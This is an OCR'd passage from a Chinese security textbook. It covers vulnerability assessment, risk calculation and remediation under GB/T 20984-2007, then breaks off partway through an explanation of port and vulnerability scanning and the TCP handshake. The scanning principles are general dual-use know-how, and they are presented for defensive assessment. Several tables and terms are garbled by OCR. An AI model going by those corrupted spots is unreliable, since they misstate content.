核查 物理 环境 所 采取 的 安全 措施 及 其 有 效 性 ， 包 括 : 机 房 选 址 、 建 筑 物 的 物理 访问 
控制 、 防 盗窃 和 防 破坏 、 防 雷击 、 防 火 、 防 水 和 防潮 、 防 静电 、 温 湿度 控制 、 电 力 供应 、 
电磁 防护 等 。 

物理 环境 安全 技术 脆弱 性 核查 的 方法 包括 : 现场 查看 、 询 问 物 理 环境 现状 ， 验 证 安 
全 措施 的 有 效 性 。 

(2) 网 络 安全 

网 络 安全 脆弱 性 是 指 网 络 通信 设备 及 网 络 安全 设备 、 网 络 通信 线路 、 网 络 通信 服务 
在 安全 方面 存在 的 脆弱 性 ， 包 括 : 非法 使 用 网 络 资源 、 非 法 访问 或 控制 网 络 通信 设备 及 
网 络 安全 设备 、 非 法 占用 网 络 通信 信道 、 网 络 通 信服 务 带宽 和 质量 不 能 保证 、 网 络 线路 
泄密 、 传 播 非法 信息 等 。 

核查 网 络 安全 所 采取 的 安全 措施 及 其 有 效 性 ， 包 括 : 网 络 拓扑 图 、vlan 划分 、 网 络 
访问 控制 、 网 络 设备 防护 、 安 全 审计 、 边 界 完整 性 检查 、 入 侵 防范 、 恶 意 代 码 防 范 等 。 

网 络 安全 脆弱 性 核查 应 该 进行 结构 分 析 、 功 能 分 析 、 安 全 功能 分 析 和 性 能 分 析 ; 可 
采取 白 盒 测 试 、 黑 盒 测 试 、 灰 盒 测 试 等 方法 。 

网 络 安全 脆弱 性 核查 方法 包括 : 查看 网 络 拓扑 图 、 网 络 安全 设备 的 安全 策略 、 配 置 
等 相关 文档 ， 询 问 相 关 人 员 、 查 看 网 络 设备 的 硬件 配置 情况 、 手 工 或 自动 查看 或 检测 网 
络 设备 的 软件 安装 和 配置 情况 、 查 看 和 验证 身份 鉴别 、 访问 控制 、 安 全 审计 等 安全 功能 、 
检查 分 析 网 络 和 安全 设备 日 志 记录 、 利 用 工具 探测 网 络 拓扑 结构 、 扫 描 网 络 安全 设备 存 
在 的 漏洞 、 探 测 网 络 非法 接 入 或 外 联 情况 、 测 试 网 络 流量 、 网 络 设备 负荷 承载 能 力 以 及 
网 络 带宽 、 手 工 或 自动 查看 和 检测 安全 措施 的 使 用 情况 并 验证 其 有 效 性 等 。 

(3) 主机 系统 安全 

主机 系统 安全 脆弱 性 是 指 主机 硬件 设备 、 操 作 系统 、 数 据 库 系统 以 及 其 他 相关 软件 
在 安全 方面 存在 的 脆弱 性 ， 包 括 : 非法 访问 或 控制 操作 系统 、 数 据 库 系 统 以 及 其 他 相关 
软件 系统 、 非 法 占用 网 络 或 系统 资源 等 。 

核查 主机 系统 所 采取 的 安全 措施 及 其 有 效 性 ， 包 括 : 身份 鉴别 、 访 问 控制 、 安 全 审 
计 、 剩 余 信息 保护 、 入 侵 防 范 、 恶 意 代码 防范 、 资 源 控制 等 。 

主机 系统 安全 脆弱 性 核查 应 该 进行 结构 、 功 能 、 安 全 功能 和 性 能 分 析 ; 可 采取 白 盒 
测试 、 黑 盒 测 试 、 灰 盒 测 试 等 方法 。 

主机 系统 安全 脆弱 性 核查 方法 包括 : 手工 或 自动 查看 或 检测 主机 硬件 设备 的 配置 情 
况 以 及 软件 系统 的 安装 配置 情况 ， 查 看 软件 系统 的 自 启动 和 运行 情况 ， 查 看 和 验证 身份 
鉴别 、 访 问 控制 、 安 全 审计 等 安全 功能 ， 查 看 并 分 析 主 机 系统 运行 产生 的 历史 数据 (如 
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鉴别 信息 、 上 网 痕迹 ) ， 检 查 并 分 析 软 件 系统 日 志 记录 ， 利 用 工具 扫描 主机 系统 存在 的 
漏洞 ， 测 试 主机 系统 的 性 能 ， 手 工 或 自动 查看 或 检测 安全 措施 的 使 用 情况 并 验证 其 有 效 
性 等 。 

(4) 应 用 系统 安全 

应 用 系统 安全 脆弱 性 是 指 应 用 系统 在 安全 方面 存在 的 脆弱 性 ， 包 括 : 非法 访问 或 控 
制 业 务 应 用 系统 ， 非 法 占用 业务 应 用 系统 资源 等 。 

核查 应 用 系统 所 采取 的 安全 措施 及 其 有 效 性 ， 包 括 : 身份 鉴别 、 访 问 控制 、 安 全 审 
计 、 剩 余 信 息 保护 、 通 信 完 整 性 、 通 信保 密 性 、 抗 抵赖 、 软 件 容错 、 资 源 控制 等 。 

应 用 系统 安全 脆弱 性 核查 应 进行 结构 、 功 能 、 安 全 功能 和 性 能 分 析 ; 可 采取 白 盒 测 
试 、 黑 盒 测 试 、 灰 盒 测试 等 方法 。 

应 用 系统 安全 脆弱 性 核查 方法 包括 : 可 查阅 应 用 系统 的 需求 、 设 计 、 测 试 、 运 行 报 
告 等 相关 文档 ， 检 查 应 用 系统 在 架构 设计 方面 的 安全 性 (包括 应 用 系统 各 功能 模块 的 容 
错 保 障 、 各 功能 模块 在 交互 过 程 中 的 安全 机 制 、 以 及 多 个 应 用 系统 之 间 数 据 交 互 接口 的 
安全 机 制 等 )， 审查 应 用 系统 源 代码 , 手工 或 自动 查看 或 检测 应 用 系统 的 安装 配置 情况 ， 
查看 和 验证 身份 鉴别 、 访 问 控 制 、 安 全 审计 等 安全 功能 ， 查 看 并 分 析 主 机 系统 运行 产生 
的 历史 数据 (如 用 户 登 录 、 操 作 记 录 ) ， 检 查 并 分 析 应 该 系统 日 志 记 录 ， 利 用 扫描 工具 
检测 应 用 系统 存在 的 漏洞 ， 测 试 应 用 系统 的 性 能 ， 手 工 或 自动 查看 或 检测 安全 措施 的 使 
用 情况 并 验证 其 有 效 性 等 。 

(5) 数据 安全 

数据 安全 脆弱 性 是 指数 据 存储 和 传播 在 安全 方面 存在 的 脆弱 性 ， 包 括 : 数据 泄露 、 
数据 算 改 和 破坏 、 数 据 不 可 用 等 。 

核查 数据 安全 所 采取 的 安全 措施 及 其 有 效 性 ， 包 括 : 数据 完整 性 保护 措施 、 数 据 保 
密 性 保护 措施 、 备 份 和 恢复 等 。 

数据 安全 核查 的 方法 包括 : 通信 协议 分 析 、 数 据 破解 、 数 据 完整 性 校 验 等 。 

2. 安全 管理 脆弱 性 核查 

根据 被 评估 组 织 安 全 管理 要 求 ， 应 对 负责 信息 系统 管理 和 运行 维护 部 门 进行 安全 管 
理 核 查 。 安 全 管理 核查 主要 通过 查阅 文档 、 抽 样 调 查 和 询问 等 方法 ， 并 核查 信息 安全 规 
章 制度 的 合理 性 、 完 整 性 、 适 用 性 等 。 

(1) 安全 管理 组 织 

安全 管理 组 织 脆弱 性 是 指 组 织 在 安全 管理 机 构 设 置 、 职 能 部 门 设置 、 岗 位 设置 、 人 
员 配 置 等 是 否 合理 ， 分 工 是 否 明确 ， 职 责 是 否 清晰 ， 工 作 是 否 落 实 等 。 

安全 管理 组 织 脆弱 性 核查 方法 包括 : 查看 安全 管理 机 构 设 置 、 职 能 部 门 设置 、 岗 位 
设置 、 人 员 配 置 等 相关 文件 ， 以 及 安全 管理 组 织 相关 活动 记录 等 文件 。 

(2) 安全 管理 策略 

安全 管理 策略 为 组 织 实施 安 全 管理 提供 指导 。 安 全 管理 策略 核查 主要 核查 安全 管理 


第 6 章 网 络 安全 技术 与 产品 


策略 的 全 面 性 和 合理 性 。 

安全 管理 策略 脆弱 性 核查 方法 包括 : 查看 是 否 存在 明确 的 安全 管理 策略 文件 ， 并 就 
安全 策略 有 关内 容 询 问 相关 人 员 , 分 析 策 略 的 有 效 性 , 识别 安全 管理 策略 存在 的 脆弱 性 。 

(3) 安全 管理 制度 

安全 管理 制度 脆弱 性 是 指 安全 管理 制度 体系 的 完备 程度 ， 制 度 落 实 等 方面 存在 的 脆 
弱 性 ， 以 及 安全 管理 制度 制定 与 发 布 、 评 审 与 修订 、 废 弃 等 管理 存在 的 问题 。 

安全 管理 制度 脆弱 性 核查 方法 包括 : 审查 相关 制度 文件 完备 情况 ， 查 看 制度 落实 的 
记录 ， 就 制度 有 关内 容 询问 相关 人 员 ， 了 解 制度 的 执行 情况 ， 综 合 识别 安全 管理 制度 存 
在 的 脆弱 性 。 

(4) 人 员 安 全 管理 

人 员 安 全 管理 包括 : 人 员 录 用 、 教 育 与 培训 、 考 核 、 离 岗 等 ， 以 及 外 部 人 员 访 问 控 
制 安全 管理 。 

人 员 安 全 管理 脆弱 性 核查 方法 包括 : 查阅 相关 制度 文件 以 及 相关 记录 ， 或 要 求 相关 
人 员 现场 执行 某 些 任务 ,或 以 外 来 人 员 身 份 访问 等 方式 进行 人 员 安 全 管理 脆弱 性 的 识别 。 

(5) 系统 运 维 管理 

系统 运 维 管理 是 保障 系统 正常 运行 的 重要 环节 ， 涉 及 系统 正常 运行 和 组 织 正常 运 
转 ， 包 括 : 物理 环境 、 资 产 、 设 备 、 介 质 、 网 络 、 系 统 、 密 码 的 安全 管理 ， 以 及 恶意 代 
码 防范 、 安 全 监控 和 监管 、 变 更 、 备 份 与 恢复 、 安 全 事件 、 应 急 预 案 管 理 等 。 

系统 运 维 管理 脆弱 性 核查 方法 包括 : 审阅 系统 运 维 的 相关 制度 文件 、 操 作 手 册 、 运 
维 记录 等 ， 现 场 查看 运 维 情况 ， 访 谈 运 维 人 员 ， 让 运 维 人 员 演 示 相 关 操 作 等 方式 进行 系 
统 运 维 管理 脆弱 性 的 识别 。 

3. 脆弱 性 分 析 报 告 

脆弱 性 严重 程度 分 为 很 高 、 高 、 中 等 、 低 、 很 低 五 个 级 别 ， 级 别 越 高 表示 脆弱 性 越 
严重 。 各 级 别 含义 可 参照 《信息 安全 技术 信息 安全 风险 评估 规范 》 (GB/T 20984 一 
2007) 。 

脆弱 性 分 析 报告 中 ， 应 当 包括 如 下 内 容 : 

© 资产 存在 的 各 种 脆弱 性 ; 

@ 脆弱 性 的 特征 及 其 赋值 ， 包 括 基本 特征 (如 访问 路 径 、 访 问 复杂 性 、 鉴 别 、 保 
密 性 影响 、 完 整 性 影响 、 可 用 性 影响 ) 、 时 间 特 征 ( 如 可 利用 性 、 补 救 水平 、 报 告 可 信 
性 ) 、 环 境 特 征 ( 如 破坏 潜力 、 目 标 分布 、 安 全 要 求 ); 

@ 计算 脆弱 性 严重 程度 的 方法 ; 

© 严重 脆弱 性 说 明 ; 

© 脆弱 性 之 间 的 关联 分 析 ， 不 同 的 脆弱 性 可 能 反映 同一 方面 的 问题 ， 或 可 能 造成 
相似 的 后 果 ， 这 些 脆弱 性 可 以 合并 ; 某 些 脆 弱 性 的 严重 程度 互相 影响 ， 特 别 对 于 某 个 资 
产 ， 其 技术 脆弱 性 的 严重 程度 还 受到 组 织 管理 脆弱 性 的 影响 ， 因 而 这 些 脆弱 性 的 严重 程 
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度 可 能 需要 修正 。 
6.3.3 ”风险 分 析 阶 段 工作 


风险 评估 是 以 围绕 被 评估 组 织 核心 业务 开展 为 原则 的 ， 评 估 业 务 所 面临 的 安全 风 
险 。 风 险 分 析 的 主要 方法 是 对 业务 相关 的 资产 、 威 胁 、 脆 弱 性 及 其 各 项 属性 的 关联 分 析 ， 
综合 进行 风险 分 析 和 计算 。 

1. 风险 分 析 模 型 

依据 《信息 安全 技术 信息 安全 风险 评估 规范 》 (GB/T 20984—2007) 所 确定 的 风 
险 分 析 方法 ， 如 图 6-64 所 示 ， 一般 构建 风险 分 析 模 型 是 将 资产 、 威 胁 、 脆 弱 性 三 个 基本 
要 素 及 每 个 要 素 相关 属性 ， 进 行 关联 ， 并 建立 各 要 素 之 间 的 相互 作用 机 制 关系 。 


威胁 识别 威胁 出 现 的 频率 
安全 事件 的 可 能 性 
脆弱 性 的 严重 程度 风险 值 


安全 事件 造成 的 损失 


资产 价值 


He 


图 6-64 ”信息 安全 风险 分 析 原 理 图 


建立 风险 评估 分 析 模型 ， 首 先 通过 威胁 与 脆弱 性 进行 关联 ， 哪 些 威胁 可 以 利用 哪些 
脆弱 性 ， 可 引发 安全 事件 ， 并 分 析 安 全 事件 发 生 的 可 能 性 ， 其 次 ， 通 过 资产 与 脆弱 性 进 
行 关联 ， 哪 些 资产 存在 脆弱 性 ， 一 旦 安全 事件 发 生 ， 造 成 的 损失 有 多 大 。 

信息 安全 风险 各 识别 要 素 的 关系 ，R=F (A, T, V) 。 其 中 ， 其 中 ,RR 表示 安全 风险 
计算 函数 ，4 表示 资产 ; 了 表 示威 胁 ; 表示 脆弱 性 。 
2. 风险 计算 方法 
组 织 或 信息 系统 安全 风险 需要 通过 具体 的 计算 方法 实现 风险 值 的 计算 。 风 险 计 算 方 
法 一 般 分 为 定性 计算 方法 和 定量 计算 方法 两 大 类 。 

Q 定性 计算 方法 是 将 风险 的 各 要 素 资产 、 威 胁 、 脆 弱 性 等 的 相关 属性 进行 量化 (或 
等 级 化 ) 赋值 ， 然 后 选用 具体 的 计算 方法 〈 如 相 乘法 或 矩阵 法 ) 进行 风险 计算 ; 

@ 定量 计算 方法 是 通过 将 资产 价值 和 风险 等 量化 为 财务 价值 的 方式 来 进行 计算 的 
一 种 方法 。 由 于 定量 计算 法 需要 等 量化 财务 价值 ， 在 实际 操作 中 往往 难以 实现 。 

由 于 定量 计算 方法 在 实际 工作 中 可 操作 性 较 差 ， 一 般 风 险 计算 多 采用 定性 计算 方 
法 。 风 险 的 定性 计算 方法 实质 反应 的 是 组 织 或 信息 系统 面临 风险 大 小 的 准确 排序 ， 确 定 
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风险 的 性 质 〈 无 关 紧 要 、 可 接受 、 待 观察 、 不 可 接受 等 ) ， 而 不 是 风险 计算 值 本 身 的 准 
确 性 。 

具体 风险 计算 方法 , 可 参考 《信息 安全 技术 信息 安全 风险 评估 规范 》 (GB/T 20984 
一 2007) 中 的 附录 A 资料 性 附录 〉 风 险 的 计算 方法 。 

3. 风险 分 析 与 评价 

通过 风险 计算 ， 应 对 风险 情况 进行 综合 分 析 与 评价 。 风 险 分 析 是 基于 计算 出 的 风险 
值 确 定 风 险 等 级 。 风 险 评 价 则 是 对 组 织 或 信息 系统 总 体 信 息 安全 风险 的 评价 。 

风险 分 析 ， 首 先 对 风险 计算 值 进 行 等 级 化 处 理 。 风 险 等 级 化 处 理 目的 是 ， 对 风险 的 
识别 直观 化 ， 便 于 对 风险 进行 评价 。 等 级 化 处 理 的 方法 是 按照 风险 值 的 高 低 进行 等 级 划 
分 ， 风 险 值 越 高 ， 风 险 等 级 越 高 。 风 险 等 级 一 般 可 划分 为 五 级 : 很 高 、 高 、 中 等 、 低 、 
很 低 ， 也 可 根据 项 目 实际 情况 确定 风险 的 等 级 数 ， 如 划分 为 高 、 中 、 低 三 级 。 

风险 评价 方法 是 根据 组 织 或 信息 系统 面临 的 各 种 风险 等 级 ， 通 过 对 不 同等 级 的 安全 
风险 进行 统计 、 分 析 ， 并 依据 各 等 级 风险 所 占 全 部 风险 的 百分比 ， 确 定 总 体 风险 状况 。 
具体 风险 评价 参见 表 6-13。 


表 6-13 安全 风险 评价 表 
占 全 部 风险 总 体 风险 评价 结果 
aot | a T a |  € 
[_si% ww | 


4. 风险 评估 报告 

风险 评估 报告 是 风险 分 析 阶 段 的 输出 文档 ， 是 对 风险 分 析 阶 段 工 作 的 总 结 。 风 险 评 
佑 报告 中 需要 对 建立 的 风险 分 析 模 型 进行 说 明 ， 并 需要 曾 明 采用 的 风险 计算 方法 及 风险 
评价 方法 。 

报告 中 应 对 计算 分 析出 的 风险 给 予 详细 说 明 ， 主 要 包括 : 风险 对 组 织 、 业 务 及 系统 
的 影响 范围 、 影 响 程度 ， 依 据 的 法 规 和 证 据 ， 风 险 评价 结论 。 

风险 评估 报告 是 风险 评估 工作 的 重要 内 容 ， 是 风险 处 置 阶段 的 关键 依据 。 同 时 ， 风 
险 评估 报告 可 作为 组 织 从 事 其 他 信息 安全 管理 工作 的 重要 参考 内 容 ， 如 信息 安全 检查 、 
信息 系统 等 级 保护 测评 、 信 息 安全 建设 等 。 


6.3.4 ”风险 处 置 建议 


6.3.41 风险 处 置 原则 
风险 处 置 依据 风险 评估 结果 ， 针 对 风险 分 析 阶 段 输出 的 风险 评估 报告 进行 风险 
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处 置 。 

风险 处 置 的 基本 原则 是 适度 接受 风险 ， 根 据 组 织 可 接受 的 处 置 成 本 将 残余 安全 风险 
控制 在 可 以 接受 的 范围 内 。 

依据 国家 、 行 业主 管 部 门 发 布 的 信息 安全 建设 要 求 进行 的 风险 处 置 ， 应 严格 执行 相 
关 规 定 。 如 依据 等 级 保护 相关 要 求实 施 的 安全 风险 加 固 工作 ， 应 满足 等 级 保护 相应 等 级 
的 安全 技术 和 管理 要 求 ， 对 于 因 不 能 够 满足 该 等 级 安全 要 求 产生 的 风险 则 不 能 够 适用 适 
度 接受 风险 的 原则 。 对 于 有 着 行业 主管 部 门 特殊 安全 要 求 的 风险 处 置 工作 ， 同 样 不 适用 
该 原则 。 
6.3.4.2 ”风险 整改 建议 

风险 处 置 方式 一 般 包 括 接受 、 消 减 、 转 移 、 规 避 等 。 安 全 整改 是 风险 处 置 中 常用 的 
风险 消减 方法 。 风 险 评估 需 提 出 安全 整改 建议 。 

安全 整改 建议 需 根 据 安 全 风险 的 严重 程度 、 加 固 措施 实施 的 难 易 程度 、 降 低 风 险 的 

时 间 紧 迫 程 度 、 所 投入 的 人 员 力 量 及 资金 成 本 等 因素 综合 考虑 

© 对 于 非常 严重 、 需 立 即 降低 且 加 国 措施 易于 实施 的 安全 风险 ， 建 议 被 评估 组 织 
立即 采取 安全 整改 措施 。 

@ 对 于 非常 严重 、 需 立即 降低 ， 但 加 固 措施 不 便于 实施 的 安全 风险 ， 建 议 被 评估 
组 织 立 即 制定 安全 整改 实施 方案 ， 尽 快 实施 安全 整改 ;整改 前 应 对 相关 安全 隐患 进行 严 
密 监控 ， 并 作 好 应 急 预 案 。 

© 对 于 比较 严重 、 需 降低 且 加 固 措施 不 易于 实施 的 安全 风险 ， 建 议 被 评估 组 织 制 
定 限 期 实施 的 整改 方案 ， 整 改 前 应 对 相关 安全 隐患 进行 监控 。 

在 风险 整改 建议 提出 之 后 ， 紧 接着 组 织 召 开 的 评审 会 是 评估 活动 结束 的 重要 标志 。 
评审 会 应 由 被 评估 组 织 组 织 ， 评 估 机 构 协 助 。 评 审 会 参与 人 员 一 般 包括 : 被 评估 组 织 、 
评估 机 构 及 专家 等 。 

被 评估 组 织 包括 : 单位 信息 安全 主管 领导 、 相 关 业 务 部 门 主管 人 员 、 信 息 技 术 部 门 
主管 人 员 、 参 与 评估 活动 的 主要 人 员 等 ; 

评估 机 构 包 括 : 项 目 组 长 、 主 要 评估 人 员 ; 

专家 包括 : 被 评估 组 织 行业 信息 安全 专家 ， 信 息 安全 专业 领域 专家 等 。 

1. 评审 文档 

评审 会 由 被 评估 组 织 人 员 主 持 ， 提 供 有 关 文 档 供 评审 人 员 进 行 核查 。 项 目 组 长 及 相 
关 人 员 需 对 评估 技术 路 线 、 工 作 计 划 、 实 施 情况 、 达 标 情 况 等 内 容 进行 汇报 ， 并 解答 评 
审 人 员 的 质疑 。 

下 表 列 出 了 信息 安全 风险 评估 项 目 验收 时 ， 评 估 小 组 应 提交 的 验收 评审 文档 ， 参 见 
表 6-14。 
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表 6-14 信息 安全 风险 评估 项 目 验收 文档 
工作 阶段 输出 文档 文档 内 容 


对 被 评估 系统 的 调查 了 解 情况 , 涉及 网 络 结构 、 系 统 


mag 
eng: (oe 情况 、 业 务 应 用 等 内 容 i 
MENG RIANNE, EE EM 
对 象 、 工 作 计划 、 主 要 技术 路 线 、 应 急 预案 等 
CF TATED 资产 调查 情况 ， 分 析 资 产 价值 ， 以 及 重要 资产 说 
roan 威胁 调查 情况 ， 明 确 存在 的 威胁 及 其 发 生 的 可 能 性 
Bahai 以 及 严重 威胁 说 明 
nome (LEDERMAN BGA OEE 


安全 组 织 、 安 全 策略 、 安 全 制度 、 人 员 安 全 、 系 统 运 
维 等 方面 的 脆弱 性 说 明 

分 析 组 织 或 信息 系统 已 部 署 安全 措施 的 有 效 性 , 包括 
技术 和 管理 两 方面 的 安全 管控 说 明 

对 资产 、 威 胁 、 脆 弱 性 等 评估 数据 进行 关联 计算 、 分 
析 评 价 等 ， 应 说 明 风险 分 析 模 型 、 分 析 计 算 方 法 

对 评估 中 发 现 的 安全 问题 给 予 有 针对 性 的 风险 处 置 
建议 


《安全 管理 脆弱 性 分 析 报 告 》 


《已 有 安全 措施 分 析 报 告 》 


风险 分 析 《风险 评估 报告 》 


风险 处 置 《安全 整改 建议 》 


2. 评审 意见 

评审 会 中 ， 需 有 专门 记录 人 员 负 责 对 各 位 专家 发 表意 见 进行 记录 。 评 审 会 成 果 是 会 
议 评 审 意 见 。 

评审 意见 包括 : 针对 评估 项 目的 实施 流程 、 风 险 分 析 的 模型 与 计算 方法 、 评 估 的 结 
论 及 评估 活动 产生 的 各 类 文档 等 内 容 提 出 意见 。 评 审 意 见 对 于 被 评估 组 织 是 否 接受 评估 
结果 ， 具 有 重要 的 参考 意义 。 

依据 评审 意见 ， 评 估 机 构 应 对 相关 报告 进行 完善 、 补 充 和 修改 ， 并 将 最 终 修 订 材 料 
一 并 提交 被 评估 组 织 ， 作 为 评估 项 目 结束 的 移交 文档 。 

风险 处 置 结束 之 后 , 还 会 存在 一 些 残余 风险 。 残余 风险 处 置 是 风险 评估 活动 的 延续 ， 
是 被 评估 组 织 按照 安全 整改 建议 全 部 或 部 分 实施 整改 工作 后 ， 对 仍然 存在 的 安全 风险 进 
行 识别 、 控 制 和 管理 的 活动 。 

对 于 已 完成 安全 加 固 措 施 的 信息 系统 ， 为 确保 安全 措施 的 有 效 性 ， 可 进行 残余 风险 
评估 ， 评 估 流 程 及 内 容 可 做 有 针对 性 的 剪裁 。 

残余 风险 评估 的 目的 是 对 信息 系统 仍 存在 的 残余 风险 进行 识别 、 控 制 和 管理 。 如 某 
些 风险 在 完成 了 适当 的 安全 措施 后 ， 残 余 风 险 的 结果 仍 处 于 不 可 接受 的 风险 范围 内 ， 应 
考虑 进一步 增强 相应 的 安全 措施 。 


6.4 网 络 安全 防护 技术 的 应 用 


信息 系统 的 安全 防护 是 一 项 非常 复杂 的 工程 ， 围 绕 它 目前 已 经 形成 了 众多 安全 技 
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术 。 而 一 个 安全 的 信息 系统 通常 要 综合 采用 多 种 技术 和 部 署 相应 的 安全 产品 ， 通 过 建立 
一 个 纵深 的 安全 防护 体系 ， 从 而 增加 攻击 者 入 侵 系 统 所 花费 的 时 间 、 成 本 和 所 需要 的 资 
源 ， 以 最 终 降低 系统 被 攻击 的 危险 ， 达 到 安全 防护 的 目标 。 以 下 将 以 信息 系统 安全 防护 
技术 中 几 种 比较 典型 的 技术 架构 为 例 ， 曾 述 信息 系统 安全 防护 技术 的 应 用 。 


6.4.1 网 络 安全 漏洞 扫描 技术 及 应 用 


1， 网 络 安全 漏洞 扫描 的 工作 原理 

安全 漏洞 扫描 技术 是 一 类 重要 的 网 络 安全 技术 。 安 全 漏洞 扫描 技术 与 防火 墙 、 入 侵 
检测 系统 互相 配合 ， 能 够 有 效 提高 网 络 的 安全 性 。 通 过 对 网 络 的 扫描 ， 网 络 管理 员 可 以 
了 解 网 络 的 安全 配置 和 运行 的 应 用 服务 ， 及 时 发 现 安全 漏洞 ， 客 观 评估 网 络 风险 等 级 。 
网 络 管理 员 可 以 根据 扫描 的 结果 更 正 网 络 安全 漏洞 和 系统 中 的 错误 配置 ， 在 黑客 攻击 前 
进行 防范 。 如 果 说 防火 墙 和 网 络 监控 系统 是 被 动 的 防御 手段 ， 那 么 安全 漏洞 扫描 就 是 一 
种 主动 的 防范 措施 ， 可 以 有 效 避 免 黑 客 攻击 行为 ， 做 到 防 患 于 未 然 。 

网 络 安全 漏洞 扫描 技术 是 计算 机 安全 扫描 技术 的 主要 分 类 之 一 。 网 络 安全 漏洞 扫描 
技术 主要 针对 系统 中 设置 的 不 合适 脆弱 的 口令 ， 以 及 针对 其 他 同安 全 规则 抵触 的 对 象 进 
行 检查 等 。 

网 络 安全 漏洞 扫描 技术 是 一 种 基于 Intemet 远程 检测 目标 网 络 或 本 地 主机 安全 性 脆 
弱点 的 技术 。 通 过 网 络 安全 漏洞 扫描 ， 系 统管 理 员 能 够 发 现 所 维护 的 Web 服务 器 的 各 种 
TCP/IP 端口 的 分 配 、 开 放 的 服务 、Web 服务 软件 版 本 和 这 些 服务 及 软件 呈现 在 Internet 
上 的 安全 漏洞 。 网 络 安全 漏洞 扫描 技术 也 是 采用 积极 的 、 非 破坏 性 的 办 法 来 检验 系统 是 
和 否 有 可 能 被 攻击 崩溃 。 它 利用 了 一 系列 的 脚本 模拟 对 系统 进行 攻击 的 行为 ， 并 对 结果 进 
行 分 析 。 这 种 技术 通常 被 用 来 进行 模拟 攻击 实验 和 安全 审计 。 网 络 安全 漏洞 扫描 技术 与 
防火 墙 、 安 全 监控 系统 互相 配合 就 能 够 为 网 络 提供 很 高 的 安全 性 。 

一 次 完整 的 网 络 安全 漏洞 扫描 分 为 三 个 阶段 : 

第 一 阶段 : 发 现 目标 主 机 或 网 络 。 

第 二 阶段 : 发现 目标 后 进一步 搜集 目标 信息 ， 包 括 操作 系统 类 型 、 运 行 的 服务 以 及 
服务 软件 的 版 本 等 。 如 果 目 标 是 一 个 网 络 ， 还 可 以 进一步 发 现 该 网 络 的 拓扑 结构 、 路 由 
设备 以 及 各 主机 的 信息 。 

第 三 阶段 : 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 

网 络 安全 漏洞 扫描 技术 包括 有 PING 扫射 (Ping sweep)、 操 作 系统 探测 (Operating 
system identification)、 如 何 探测 访问 控制 规则 (firewalking)、 端 口 扫描 (Port scan) 以 
及 漏洞 扫描 〈vulnerability scan) 等 。 这 些 技术 在 网 络 安全 漏洞 扫描 的 三 个 阶段 中 各 有 
体现 。 

PING 扫描 用 于 网 络 安全 漏洞 扫描 的 第 一 阶段 ， 可 以 帮助 我 们 识别 系统 是 否 处 于 活 
动 状态 。 操 作 系统 探测 、 如 何 探测 访问 控制 规则 和 端口 扫描 用 于 网 络 安全 漏洞 扫描 的 第 
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二 阶段 ， 其 中 操作 系统 探测 顾名思义 就 是 对 目标 主机 运行 的 操作 系统 进行 识别 ;如 何 探 
测 访问 控制 规则 用 于 获取 被 防火 墙 保护 的 远 端 网 络 的 资料 ， 而 端口 扫描 是 通过 与 目标 系 
统 的 TCP/IP 端口 连接 , 并 查看 该 系统 处 于 监听 或 运行 状态 的 服务 。 网络 安 全 漏洞 扫描 第 
三 阶段 采用 的 漏洞 扫描 通常 是 在 端口 扫描 的 基础 上 ， 对 得 到 的 信息 进行 相关 处 理 ， 进 而 
检测 出 目标 系统 存在 的 安全 漏洞 。 

网 络 安全 漏洞 扫描 技术 的 两 大 核心 技术 就 是 端口 扫描 技术 与 漏洞 扫描 技术 ， 这 两 种 
技术 广泛 运用 于 当前 较 成 熟 的 网 络 扫描 器 中 , 如 著名 的 Nmap 和 Nessus 就 是 利用 了 这 两 
种 技术 。 下 面 将 分 别 介绍 这 两 种 技术 的 原理 。 

网 络 中 一 个 端口 就 是 一 个 潜在 的 通信 通道 ， 也 就 是 一 个 入 侵 通道 。 对 目标 计算 机 进 
行 端口 扫描 ， 能 得 到 许多 有 用 的 信息 ， 从 而 发 现 系统 的 安全 漏洞 。 它 使 系统 用 户 了 解 系 
统 目 前 向 外 界 提供 了 哪些 服务 ， 从 而 为 系统 用 户 管理 网 络 提供 了 一 种 手段 。 

端口 扫描 向 目标 主机 的 TCP/IP 服务 端口 发 送 探测 数据 包 ， 并 记录 目标 主机 的 响应 。 
通过 分 析 响 应 来 判断 服务 端口 是 打开 还 是 关闭 ， 就 可 以 得 知 端口 提供 的 服务 或 信息 。 端 
口 扫描 也 可 以 通过 捕获 本 地 主机 或 服务 器 的 流入 流出 P 数据 包 来 监视 本 地 主机 的 运行 
情况 ， 它 仅 能 对 接收 到 的 数据 进行 分 析 ， 帮 助 我 们 发 现 目 标 主机 的 某 些 内 在 的 弱点 ， 而 
不 会 提供 进入 一 个 系统 的 详细 步骤 。 

端口 扫描 主要 有 经 典 的 扫描 器 (全 连接 ) 以 及 所 谓 的 SYN CHER) 扫描 器 。 此 外 
还 有 间接 扫描 和 秘密 扫描 等 。 要 想 理解 它们 的 工作 原理 , 首先 应 该 对 TCP/IP 数据 包 的 内 
容 以 及 TCP 的 秘密 握手 机 制 有 所 了 解 。 除 了 携带 发 送 和 接收 方 的 IP 地 址 和 端口 号 外 
TCP 的 报头 还 包含 一 个 序列 号 和 一 些 起 着 特殊 作用 的 标记 位 ， 如 : SYN, ACK fil FIN. 

当 系统 间 彼 此 说 “HELLO ”或 道 “GOODBYE” 时 ， 就 会 用 到 所 谓 的 握手 机 制 。 让 
我 们 先 看 看 如 何 利 用 TCP/IP 的 握手 机 制 来 建立 一 个 连接 。 当 你 想 网 上 冲浪 ， 或 者 想 
TELNET 到 远程 主机 时 三 次 握手 机 制 就 会 为 生成 一 个 这 样 的 连接 。 

它 的 工作 过 程 大 致 如 下 : 握手 的 第 一 步 ， 一 台 计 算 机 首先 请 求 和 另外 一 台 计 算 机 建 
立 连接 ， 它 通过 发 送 SYN 请 求 来 完成 ， 也 即 前 面 提 到 的 SYN 标记 位 置 位 。 消 息 的 内 容 
就 像 是 说 :“HI， 听 着 ， 我 想 和 你 的 机 子 端口 X 说话， 咱们 先 同 步 一 下 ， 我 用 序列 号 Y 
来 开始 连接 。” 端 口 X 表示 了 连接 的 服务 类 型 。 两 台 计 算 机 间 的 每 条 信息 都 有 一 个 由 发 
送 方 产生 的 序列 号 ， 序 列 号 的 使 用 使 得 双方 知道 它们 之 间 是 同步 的 ， 而 且 还 可 以 起 到 丢 
失信 息 时 或 接收 顺序 错误 时 发 送 警 告 信 息 的 作用 。 

握手 的 第 二 步 ， 接 收 到 SYN 请 求 的 计算 机 响应 发 送 来 的 序列 号 ， 它 会 将 ACK 标记 
